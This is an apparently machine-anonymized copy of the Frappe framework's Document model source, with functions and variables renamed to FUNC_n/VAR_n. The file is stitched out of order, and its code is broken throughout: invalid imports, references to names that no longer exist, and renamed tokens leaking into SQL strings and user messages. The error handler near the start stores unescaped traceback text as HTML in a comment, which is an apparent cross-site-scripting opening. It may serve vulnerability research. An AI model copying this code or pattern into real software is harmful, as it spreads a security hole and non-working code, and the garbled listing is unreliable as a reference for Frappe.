@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
def FUNC_50(self):
self.load_doc_before_save()
self.reset_seen()
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def FUNC_52(self):
VAR_69 = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_90 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_90, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_70 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_70.for_insert(self)
VAR_70.insert(VAR_11=True)
elif VAR_70.set_diff(self._doc_before_save, self):
VAR_70.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def FUNC_60(VAR_6):
def FUNC_83(self, VAR_71):
if isinstance(VAR_71, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(VAR_71)
else:
self._return_value = VAR_71 or self.get("_return_value")
def FUNC_84(VAR_72, *VAR_73):
def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
FUNC_83(self, VAR_72(self, *VAR_0, **VAR_1))
for VAR_6 in VAR_73:
FUNC_83(self, VAR_6(self, VAR_25, *VAR_0, **VAR_1))
return self._return_value
return FUNC_86
def FUNC_85(self, *VAR_0, **VAR_1):
VAR_73 = []
VAR_25 = VAR_6.__name__
VAR_91 = frappe.get_doc_hooks()
for handler in VAR_91.get(self.doctype, {}).get(VAR_25, []) \
+ VAR_91.get("*", {}).get(VAR_25, []):
VAR_73.append(frappe.get_attr(handler))
VAR_92 = FUNC_84(VAR_6, *VAR_73)
return VAR_92(self, VAR_25, *VAR_0, **VAR_1)
return FUNC_85
def FUNC_61(self, VAR_25):
VAR_72 = getattr(self, VAR_25, None)
if not VAR_72:
raise NotFound("Method {0} not found".format(VAR_25))
elif not getattr(VAR_72, "whitelisted", False):
raise Forbidden("Method {0} not whitelisted".format(VAR_25))
def FUNC_62(self, VAR_18, VAR_30, VAR_31, VAR_32=None, VAR_33=None):
VAR_74 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_32:
doc = self
VAR_75 = VAR_32.get_value(VAR_18)
VAR_19 = VAR_32.meta.get_field(VAR_18)
VAR_31 = VAR_32.cast(VAR_31, VAR_19)
if not frappe.compare(VAR_75, VAR_30, VAR_31):
VAR_93 = VAR_32.meta.get_label(VAR_18)
VAR_94 = VAR_74.get(VAR_30, condition)
if VAR_32.parentfield:
VAR_87 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_32.idx, VAR_93, VAR_94, VAR_31)
else:
VAR_87 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_93, VAR_94, VAR_31)
msgprint(VAR_87, VAR_33=raise_exception or True)
def FUNC_63(self, VAR_34, VAR_33=None):
if not (isinstance(self.get(VAR_34), list) and len(self.get(VAR_34)) > 0):
VAR_93 = self.meta.get_label(VAR_34)
frappe.throw(_("Table {0} cannot be empty").format(VAR_93), VAR_33 or frappe.EmptyTableError)
def FUNC_64(self, VAR_32, VAR_35=None):
if not VAR_35:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_32.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_35:
VAR_32.set(VAR_18, flt(VAR_32.get(VAR_18), self.precision(VAR_18, VAR_32.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_36='Comment', VAR_37=None, VAR_38=None, VAR_39=None, VAR_40=None, VAR_41=None):
VAR_66 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_36,
"comment_email": VAR_38 or frappe.session.user,
"comment_by": VAR_41,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_37 or VAR_36,
"link_doctype": VAR_39,
"link_name": VAR_40
}).insert(VAR_11=True)
return VAR_66
def FUNC_67(self, VAR_42=None):
if not VAR_42:
user = frappe.session.user
if self.meta.track_seen:
VAR_95 = self.get('_seen') or []
VAR_95 = frappe.parse_json(VAR_95)
if VAR_42 not in VAR_95:
_seen.append(VAR_42)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_95), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_42=None):
if not VAR_42:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_76 = getattr(self, "_liked_by", None)
if VAR_76:
return json.loads(VAR_76)
else:
return []
def FUNC_71(self, VAR_43, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_43] = VAR_26
def FUNC_72(self, VAR_43=None):
if not VAR_43:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_43]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
def FUNC_74(self, VAR_44=None):
VAR_77 = self.get_signature()
if file_lock.lock_exists(VAR_77):
VAR_96 = True
if VAR_44:
for i in range(VAR_44):
time.sleep(1)
if not file_lock.lock_exists(VAR_77):
VAR_96 = False
break
if VAR_96:
raise frappe.DocumentLockedError
file_lock.create_lock(VAR_77)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_45, VAR_46):
if date_diff(self.get(VAR_46), self.get(VAR_45)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_46)),
frappe.bold(self.meta.get_label(VAR_45)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_78 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_79 = set([assignment.owner for assignment in VAR_78])
return VAR_79
def FUNC_78(self, VAR_47):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_47)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
VAR_32 = frappe.get_doc(VAR_2, VAR_3)
VAR_32.unlock()
try:
getattr(VAR_32, VAR_4)(**VAR_1)
except Exception:
frappe.db.rollback()
if frappe.local.message_log:
VAR_87 = json.loads(frappe.local.message_log[-1]).get('message')
else:
VAR_87 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
VAR_32.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_87)
VAR_32.notify_update()
|
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint, FUNC_61
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_82
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
if VAR_0:
if isinstance(VAR_0[0], BaseDocument):
return VAR_0[0]
elif isinstance(VAR_0[0], string_types):
VAR_2 = VAR_0[0]
elif isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(VAR_0) < 2 and VAR_1:
if 'doctype' in VAR_1:
VAR_2 = VAR_1['doctype']
else:
raise ValueError('"doctype" is a required key')
VAR_5 = get_controller(VAR_2)
if VAR_5:
return VAR_5(*VAR_0, **VAR_1)
raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
frappe.whitelist()(VAR_6)
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_81 = frappe.db.get_singles_dict(self.doctype)
if not VAR_81:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_81["name"] = self.doctype
del VAR_81["__islocal"]
super(CLASS_0, self).__init__(VAR_81)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_82 = DOCTYPE_TABLE_FIELDS
else:
VAR_82 = self.meta.get_table_fields()
for VAR_19 in VAR_82:
VAR_52 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_52:
self.set(VAR_19.fieldname, VAR_52)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_83 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_83.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
def FUNC_14(self, VAR_18, VAR_19=None):
VAR_50 = []
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.db_update()
VAR_50.append(VAR_21.name)
if VAR_19.options in (self.flags.ignore_children_type or []):
return
if VAR_50:
VAR_84 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s
and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_50))),
[self.name, self.doctype, VAR_18] + VAR_50)
if len(VAR_84) > 0:
frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
','.join(['%s'] * len(VAR_84))), tuple(row[0] for row in VAR_84))
else:
frappe.db.sql("""delete from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s""".format(VAR_19.options),
(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_51 = self.get_doc_before_save()
return VAR_51.get(VAR_18)!=self.get(VAR_18) if VAR_51 else True
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
if self.flags.name_set and not VAR_20:
return
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if VAR_15:
self.name = VAR_15
else:
FUNC_17(self)
if VAR_16:
for VAR_21 in self.get_all_children():
FUNC_17(VAR_21)
self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_85 = self.as_dict()
for VAR_45, VAR_26 in iteritems(VAR_85):
if VAR_26==None:
VAR_85[VAR_45] = ""
return VAR_85
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_85 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
def FUNC_23(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
VAR_52 = self.get_all_children()
for VAR_21 in VAR_52:
VAR_21._validate_data_fields()
VAR_21._validate_selects()
VAR_21._validate_non_negative()
VAR_21._validate_length()
VAR_21._extract_images_from_text_editor()
VAR_21._sanitize_content()
VAR_21._save_passwords()
if self.is_new():
for VAR_18 in optional_fields:
self.set(VAR_18, None)
else:
self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_88 = FUNC_81(VAR_19)
frappe.throw(VAR_88, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
if frappe.flags.in_install == 'frappe': return
VAR_53 = self.meta.get_workflow()
if VAR_53:
FUNC_25(self)
if not self._action == 'save':
set_workflow_state_on_action(self, VAR_53, self._action)
def FUNC_26(self):
VAR_54 = self.meta.get_set_only_once_fields()
if VAR_54 and self._doc_before_save:
for field in VAR_54:
VAR_98 = False
VAR_26 = self.get(field.fieldname)
VAR_55 = self._doc_before_save.get(field.fieldname)
if field.fieldtype in VAR_82:
VAR_98 = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
VAR_98 = str(VAR_26) != str(VAR_55)
else:
VAR_98 = VAR_26 != VAR_55
if VAR_98:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_55 = self._doc_before_save.get(VAR_18)
VAR_56 = True
if len(VAR_55) != len(VAR_26):
VAR_56 = False
else:
for i, VAR_21 in enumerate(VAR_55):
VAR_99 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_100 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_45 in ('modified', 'modified_by', 'creation'):
del VAR_99[VAR_45]
del VAR_100[VAR_45]
if VAR_100 != VAR_99:
VAR_56 = False
break
return VAR_56
def FUNC_28(self):
if frappe.session.user == "Administrator":
return
VAR_57 = False
VAR_58 = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
VAR_58 += frappe.get_meta(table_field.options).fields or []
for VAR_19 in VAR_58:
if VAR_19.permlevel > 0:
VAR_57 = True
break
if not VAR_57:
return
VAR_59 = self.get_permlevel_access('read')
for VAR_19 in self.meta.fields:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
self.set(VAR_19.fieldname, None)
for table_field in self.meta.get_table_fields():
for VAR_19 in frappe.get_meta(table_field.options).fields or []:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
for child in self.get(table_field.fieldname) or []:
child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_59 = self.get_permlevel_access()
VAR_60 = self.meta.get_high_permlevel_fields()
if VAR_60:
self.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_60:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_61 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_61 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_86 = self.meta.permissions
return VAR_86
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_62 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_62)
for VAR_19 in self.meta.get_table_fields():
VAR_62 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_62)
def FUNC_34(self):
VAR_63 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_101 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_101 = VAR_101 and VAR_101[0][0]
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
else:
VAR_102 = frappe.db.sql("""select VAR_101, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_102:
frappe.throw(_("Record does not exist"))
else:
VAR_102 = tmp[0]
VAR_101 = cstr(VAR_102.modified)
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
self.check_docstatus_transition(VAR_102.docstatus)
if VAR_63:
frappe.msgprint(_("Error: CLASS_0 has been VAR_101 after you have opened it") \
+ (" (%s, %s). " % (VAR_101, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_35=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def FUNC_35(self, VAR_23):
if not self.docstatus:
self.docstatus = 0
if VAR_23==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
elif VAR_23==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
elif VAR_23==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_64 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_64.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_64:
return
for VAR_18, VAR_88 in VAR_64:
msgprint(VAR_88)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_64)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_65, VAR_66 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_87 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_65.extend(VAR_87[0])
VAR_66.extend(VAR_87[1])
if VAR_65:
VAR_88 = ", ".join((each[2] for each in VAR_65))
frappe.throw(_("Could not find {0}").format(VAR_88),
frappe.LinkValidationError)
if VAR_66:
VAR_88 = ", ".join((each[2] for each in VAR_66))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_88),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_67 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_82]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_67.extend(VAR_26)
return VAR_67
def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
if "flags" in VAR_1:
del VAR_1["flags"]
if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
VAR_6 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
else:
VAR_6 = lambda self, *VAR_0, **VAR_1: None
VAR_6.__name__ = str(VAR_25)
VAR_68 = CLASS_0.hook(VAR_6)(self, *VAR_0, **VAR_1)
self.run_notifications(VAR_25)
run_webhooks(self, VAR_25)
run_server_script_for_doc_event(self, VAR_25)
return VAR_68
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_89 = frappe.cache().hget('notifications', self.doctype)
if VAR_89==None:
VAR_89 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_89)
self.flags.notifications = VAR_89
if not self.flags.notifications:
return
def FUNC_82(VAR_69):
if not VAR_69.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_69.name, VAR_69.event)
self.flags.notifications_executed.append(VAR_69.name)
VAR_70 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_70['on_change'] = 'Value Change'
for VAR_69 in self.flags.notifications:
